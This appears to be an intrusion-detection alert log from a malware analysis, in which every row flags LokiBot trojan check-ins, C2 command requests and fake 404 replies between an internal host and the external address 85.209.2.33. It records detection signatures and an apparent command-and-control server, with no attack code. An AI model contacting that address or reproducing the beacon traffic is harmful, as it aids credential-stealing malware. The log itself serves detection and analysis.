                                                            12/01/21-20:21:42.732834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:42.732834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:42.732834TCP2025381ET TROJAN LokiBot Checkin4990380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:42.732834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:43.645495TCP2025483ET TROJAN LokiBot Fake 404 Response804990385.209.2.33192.168.11.20
                                                            12/01/21-20:21:44.064952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:44.064952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:44.064952TCP2025381ET TROJAN LokiBot Checkin4990480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:44.064952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:44.916895TCP2025483ET TROJAN LokiBot Fake 404 Response804990485.209.2.33192.168.11.20
                                                            12/01/21-20:21:45.346563TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:45.346563TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:45.346563TCP2025381ET TROJAN LokiBot Checkin4990580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:45.346563TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:46.189351TCP2025483ET TROJAN LokiBot Fake 404 Response804990585.209.2.33192.168.11.20
                                                            12/01/21-20:21:46.615925TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:46.615925TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:46.615925TCP2025381ET TROJAN LokiBot Checkin4990680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:46.615925TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:47.531367TCP2025483ET TROJAN LokiBot Fake 404 Response804990685.209.2.33192.168.11.20
                                                            12/01/21-20:21:47.966669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:47.966669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:47.966669TCP2025381ET TROJAN LokiBot Checkin4990780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:47.966669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990780192.168.11.2085.209.2.33
                                                            12/01/21-20:21:48.833620TCP2025483ET TROJAN LokiBot Fake 404 Response804990785.209.2.33192.168.11.20
                                                            12/01/21-20:21:49.277505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:49.277505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:49.277505TCP2025381ET TROJAN LokiBot Checkin4990880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:49.277505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990880192.168.11.2085.209.2.33
                                                            12/01/21-20:21:50.160232TCP2025483ET TROJAN LokiBot Fake 404 Response804990885.209.2.33192.168.11.20
                                                            12/01/21-20:21:50.569102TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:50.569102TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:50.569102TCP2025381ET TROJAN LokiBot Checkin4990980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:50.569102TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990980192.168.11.2085.209.2.33
                                                            12/01/21-20:21:51.619801TCP2025483ET TROJAN LokiBot Fake 404 Response804990985.209.2.33192.168.11.20
                                                            12/01/21-20:21:52.077672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:52.077672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:52.077672TCP2025381ET TROJAN LokiBot Checkin4991080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:52.077672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991080192.168.11.2085.209.2.33
                                                            12/01/21-20:21:54.328325TCP2025483ET TROJAN LokiBot Fake 404 Response804991085.209.2.33192.168.11.20
                                                            12/01/21-20:21:54.765904TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:54.765904TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:54.765904TCP2025381ET TROJAN LokiBot Checkin4991180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:54.765904TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.11.2085.209.2.33
                                                            12/01/21-20:21:55.633998TCP2025483ET TROJAN LokiBot Fake 404 Response804991185.209.2.33192.168.11.20
                                                            12/01/21-20:21:56.056160TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:56.056160TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:56.056160TCP2025381ET TROJAN LokiBot Checkin4991380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:56.056160TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.11.2085.209.2.33
                                                            12/01/21-20:21:56.961110TCP2025483ET TROJAN LokiBot Fake 404 Response804991385.209.2.33192.168.11.20
                                                            12/01/21-20:21:57.397763TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:57.397763TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:57.397763TCP2025381ET TROJAN LokiBot Checkin4991480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:57.397763TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.11.2085.209.2.33
                                                            12/01/21-20:21:58.085713TCP2025483ET TROJAN LokiBot Fake 404 Response804991485.209.2.33192.168.11.20
                                                            12/01/21-20:21:58.518041TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:58.518041TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:58.518041TCP2025381ET TROJAN LokiBot Checkin4991580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:58.518041TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.11.2085.209.2.33
                                                            12/01/21-20:21:59.244154TCP2025483ET TROJAN LokiBot Fake 404 Response804991585.209.2.33192.168.11.20
                                                            12/01/21-20:21:59.669790TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:59.669790TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:59.669790TCP2025381ET TROJAN LokiBot Checkin4991680192.168.11.2085.209.2.33
                                                            12/01/21-20:21:59.669790TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:00.593904TCP2025483ET TROJAN LokiBot Fake 404 Response804991685.209.2.33192.168.11.20
                                                            12/01/21-20:22:01.031680TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:01.031680TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:01.031680TCP2025381ET TROJAN LokiBot Checkin4991780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:01.031680TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:01.940406TCP2025483ET TROJAN LokiBot Fake 404 Response804991785.209.2.33192.168.11.20
                                                            12/01/21-20:22:02.293226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:02.293226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:02.293226TCP2025381ET TROJAN LokiBot Checkin4991880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:02.293226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:03.116631TCP2025483ET TROJAN LokiBot Fake 404 Response804991885.209.2.33192.168.11.20
                                                            12/01/21-20:22:03.522223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:03.522223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:03.522223TCP2025381ET TROJAN LokiBot Checkin4991980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:03.522223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:04.468199TCP2025483ET TROJAN LokiBot Fake 404 Response804991985.209.2.33192.168.11.20
                                                            12/01/21-20:22:04.892370TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:04.892370TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:04.892370TCP2025381ET TROJAN LokiBot Checkin4992080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:04.892370TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:05.700258TCP2025483ET TROJAN LokiBot Fake 404 Response804992085.209.2.33192.168.11.20
                                                            12/01/21-20:22:06.120588TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:06.120588TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:06.120588TCP2025381ET TROJAN LokiBot Checkin4992180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:06.120588TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:07.058257TCP2025483ET TROJAN LokiBot Fake 404 Response804992185.209.2.33192.168.11.20
                                                            12/01/21-20:22:07.456104TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:07.456104TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:07.456104TCP2025381ET TROJAN LokiBot Checkin4992280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:07.456104TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:08.220687TCP2025483ET TROJAN LokiBot Fake 404 Response804992285.209.2.33192.168.11.20
                                                            12/01/21-20:22:08.649714TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:08.649714TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:08.649714TCP2025381ET TROJAN LokiBot Checkin4992380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:08.649714TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:09.577078TCP2025483ET TROJAN LokiBot Fake 404 Response804992385.209.2.33192.168.11.20
                                                            12/01/21-20:22:10.007808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:10.007808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:10.007808TCP2025381ET TROJAN LokiBot Checkin4992480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:10.007808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:10.862089TCP2025483ET TROJAN LokiBot Fake 404 Response804992485.209.2.33192.168.11.20
                                                            12/01/21-20:22:11.314433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:11.314433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:11.314433TCP2025381ET TROJAN LokiBot Checkin4992580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:11.314433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:12.229774TCP2025483ET TROJAN LokiBot Fake 404 Response804992585.209.2.33192.168.11.20
                                                            12/01/21-20:22:12.669324TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:12.669324TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:12.669324TCP2025381ET TROJAN LokiBot Checkin4992680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:12.669324TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:13.491719TCP2025483ET TROJAN LokiBot Fake 404 Response804992685.209.2.33192.168.11.20
                                                            12/01/21-20:22:13.927452TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:13.927452TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:13.927452TCP2025381ET TROJAN LokiBot Checkin4992780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:13.927452TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:17.817700TCP2025483ET TROJAN LokiBot Fake 404 Response804992785.209.2.33192.168.11.20
                                                            12/01/21-20:22:18.238108TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:18.238108TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:18.238108TCP2025381ET TROJAN LokiBot Checkin4992880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:18.238108TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:19.103222TCP2025483ET TROJAN LokiBot Fake 404 Response804992885.209.2.33192.168.11.20
                                                            12/01/21-20:22:19.498001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:19.498001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:19.498001TCP2025381ET TROJAN LokiBot Checkin4992980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:19.498001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:20.374324TCP2025483ET TROJAN LokiBot Fake 404 Response804992985.209.2.33192.168.11.20
                                                            12/01/21-20:22:20.815425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:20.815425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:20.815425TCP2025381ET TROJAN LokiBot Checkin4993080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:20.815425TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:21.638426TCP2025483ET TROJAN LokiBot Fake 404 Response804993085.209.2.33192.168.11.20
                                                            12/01/21-20:22:22.051255TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:22.051255TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:22.051255TCP2025381ET TROJAN LokiBot Checkin4993180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:22.051255TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:22.935783TCP2025483ET TROJAN LokiBot Fake 404 Response804993185.209.2.33192.168.11.20
                                                            12/01/21-20:22:23.377828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:23.377828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:23.377828TCP2025381ET TROJAN LokiBot Checkin4993280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:23.377828TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:24.343022TCP2025483ET TROJAN LokiBot Fake 404 Response804993285.209.2.33192.168.11.20
                                                            12/01/21-20:22:24.770659TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:24.770659TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:24.770659TCP2025381ET TROJAN LokiBot Checkin4993380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:24.770659TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:25.739138TCP2025483ET TROJAN LokiBot Fake 404 Response804993385.209.2.33192.168.11.20
                                                            12/01/21-20:22:26.162886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:26.162886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:26.162886TCP2025381ET TROJAN LokiBot Checkin4993480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:26.162886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:27.016238TCP2025483ET TROJAN LokiBot Fake 404 Response804993485.209.2.33192.168.11.20
                                                            12/01/21-20:22:27.454539TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:27.454539TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:27.454539TCP2025381ET TROJAN LokiBot Checkin4993580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:27.454539TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:28.159979TCP2025483ET TROJAN LokiBot Fake 404 Response804993585.209.2.33192.168.11.20
                                                            12/01/21-20:22:28.602857TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:28.602857TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:28.602857TCP2025381ET TROJAN LokiBot Checkin4993680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:28.602857TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:29.522461TCP2025483ET TROJAN LokiBot Fake 404 Response804993685.209.2.33192.168.11.20
                                                            12/01/21-20:22:29.943411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:29.943411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:29.943411TCP2025381ET TROJAN LokiBot Checkin4993780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:29.943411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:30.730315TCP2025483ET TROJAN LokiBot Fake 404 Response804993785.209.2.33192.168.11.20
                                                            12/01/21-20:22:31.121229TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:31.121229TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:31.121229TCP2025381ET TROJAN LokiBot Checkin4993880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:31.121229TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:31.989597TCP2025483ET TROJAN LokiBot Fake 404 Response804993885.209.2.33192.168.11.20
                                                            12/01/21-20:22:32.370026TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:32.370026TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:32.370026TCP2025381ET TROJAN LokiBot Checkin4993980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:32.370026TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:33.258564TCP2025483ET TROJAN LokiBot Fake 404 Response804993985.209.2.33192.168.11.20
                                                            12/01/21-20:22:33.608001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:33.608001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:33.608001TCP2025381ET TROJAN LokiBot Checkin4994080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:33.608001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:34.346491TCP2025483ET TROJAN LokiBot Fake 404 Response804994085.209.2.33192.168.11.20
                                                            12/01/21-20:22:34.767430TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:34.767430TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:34.767430TCP2025381ET TROJAN LokiBot Checkin4994180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:34.767430TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:35.541710TCP2025483ET TROJAN LokiBot Fake 404 Response804994185.209.2.33192.168.11.20
                                                            12/01/21-20:22:35.988905TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:35.988905TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:35.988905TCP2025381ET TROJAN LokiBot Checkin4994280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:35.988905TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:37.246103TCP2025483ET TROJAN LokiBot Fake 404 Response804994285.209.2.33192.168.11.20
                                                            12/01/21-20:22:37.676614TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:37.676614TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:37.676614TCP2025381ET TROJAN LokiBot Checkin4994380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:37.676614TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:41.580643TCP2025483ET TROJAN LokiBot Fake 404 Response804994385.209.2.33192.168.11.20
                                                            12/01/21-20:22:42.020973TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:42.020973TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:42.020973TCP2025381ET TROJAN LokiBot Checkin4994480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:42.020973TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:42.910133TCP2025483ET TROJAN LokiBot Fake 404 Response804994485.209.2.33192.168.11.20
                                                            12/01/21-20:22:43.334107TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:43.334107TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:43.334107TCP2025381ET TROJAN LokiBot Checkin4994580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:43.334107TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:44.238292TCP2025483ET TROJAN LokiBot Fake 404 Response804994585.209.2.33192.168.11.20
                                                            12/01/21-20:22:44.660769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:44.660769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:44.660769TCP2025381ET TROJAN LokiBot Checkin4994680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:44.660769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:45.539071TCP2025483ET TROJAN LokiBot Fake 404 Response804994685.209.2.33192.168.11.20
                                                            12/01/21-20:22:45.979483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:45.979483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:45.979483TCP2025381ET TROJAN LokiBot Checkin4994780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:45.979483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:46.673098TCP2025483ET TROJAN LokiBot Fake 404 Response804994785.209.2.33192.168.11.20
                                                            12/01/21-20:22:47.110118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:47.110118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:47.110118TCP2025381ET TROJAN LokiBot Checkin4994880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:47.110118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:47.972766TCP2025483ET TROJAN LokiBot Fake 404 Response804994885.209.2.33192.168.11.20
                                                            12/01/21-20:22:48.400800TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:48.400800TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:48.400800TCP2025381ET TROJAN LokiBot Checkin4994980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:48.400800TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994980192.168.11.2085.209.2.33
                                                            12/01/21-20:22:49.270920TCP2025483ET TROJAN LokiBot Fake 404 Response804994985.209.2.33192.168.11.20
                                                            12/01/21-20:22:49.717816TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:49.717816TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995080192.168.11.2085.209.2.33
